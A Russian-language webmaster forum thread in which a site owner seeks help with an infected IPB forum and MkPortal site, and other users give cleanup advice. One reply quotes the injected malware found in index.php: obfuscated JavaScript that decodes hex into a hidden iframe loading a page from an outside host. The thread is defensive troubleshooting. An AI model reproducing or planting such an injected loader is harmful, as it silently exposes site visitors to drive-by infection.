Как избавться от вирос на сайте?

12
Master812
На сайте с 23.12.2007
Offline
168
1315

Мой форум ipb и cms MkPortal заражены трояном или вирусом. Скажите, пожалуйста, как быть?

И ещё вопрос: мог ли обычный пользователь форума заразить сайт вирусом или в этом только моя вина?

raspberry pi сайт ( https://4raspberrypi.ru/ ) и orange pi сайт ( https://orangepi.su/ ) и новостной движок ( https://generalscript.ru/ )
LEOnidUKG
На сайте с 25.11.2006
Offline
1776
#1

или Вы или движки или хакеры нашли дырки или ваш фтп взломали или сервер взломали или кто-то с пьяну подобрал пароль к фтп )))

А как избавиться... взять пароли поменять на фтп и убить его ручками...

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
Master812
На сайте с 23.12.2007
Offline
168
#2

LEOnidUKG, спасибо. И ещё вопрос: сама БД форума и CMS тоже заражена? Или вирус заражает только страницы?

Я думаю может снести всё нафиг с сайта и затем закинуть странички с моего винча а БД останется та же. Слава богу резервную копию сайта я сделал уже давно)))

zhitov
На сайте с 30.01.2005
Offline
219
#3

Скорее всего у Вас вирус на компе, который украл пароли от фтп.

Чистить комп, менять пароли и вычищать код форума.

Строительные калькуляторы ( https://www.zhitov.com/ )
Master812
На сайте с 23.12.2007
Offline
168
#4

zhitov, это я понял. Спасибо.

У меня другой вопрос: БД сайта тоже заражена?

dayw
На сайте с 25.01.2006
Offline
116
#5

смотря какой вирус)

Если "стандартный", то с базой все нормально

Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
Master812
На сайте с 23.12.2007
Offline
168
#6

dayw, а как это проверить?

daykkin
На сайте с 10.04.2007
Offline
100
#7

проверьте свой index.php на наличие подгружаемых подозрительных ява скриптов.. отпишитесь тут.. а потом уже будем думать..)

Hakuna Matata! What a wonderful phrase. Hakuna Matata! Ain't no passing craze. It means no worries for the rest of your days, It's our problem-free, philosophy, Hakuna Matata! :)
Master812
На сайте с 23.12.2007
Offline
168
#8

daykkin, честно говоря, не очень разбираюсь в ява-скриптах ,поэтому не смогу определить вредоносный код.

Я закачал весь код страницы index.php на хостинг файлов. Вот ссылка для скачки http://www.sendspace.com/file/kw0929

Посомтрите пожалуйста, если не трудно.

kxk
На сайте с 30.01.2005
Offline
990
kxk
#9

Master812, У вас nod32 антивирус на пк установлен ?

Ваш DEVOPS
daykkin
На сайте с 10.04.2007
Offline
100
#10

Ну чтож тут трудного, вот в самом конце он идет..


<script>function v47a4f475a4e08(v47a4f475a55d5){ var v47a4f475a5da5=16; return(parseInt(v47a4f475a55d5,v47a4f475a5da5));}function v47a4f475a6d44(v47a4f475a7514){ var v47a4f475a8c82=2; var v47a4f475a7ce3='';for(v47a4f475a84b3=0; v47a4f475a84b3<v47a4f475a7514.length; v47a4f475a84b3+=v47a4f475a8c82){ v47a4f475a7ce3+=(String.fromCharCode(v47a4f475a4e08(v47a4f475a7514.substr(v47a4f475a84b3, v47a4f475a8c82))));}return v47a4f475a7ce3;} document.write(v47a4f475a6d44('3C696672616D65206E616D653D276438393436633927207372633D27687474703A2F2F7468656C6F62616E6F66662E636F6D2F6D7973686F702F746573742F696E6465782E706870272077696474683D373939206865696768743D333531207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

Предлагаю Вам сменить все пароли, на фтп, кошельки и прочее.. Сменить браузер - если сейчас у Вас IE, поставить хороший антивирус и фаервол на машину.. А так же установить дополнительную защиту, которая будет при изменении размера index.php отсылать Вам сообщение на icq.. Как реализовать, стучите в асю - помогу..

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий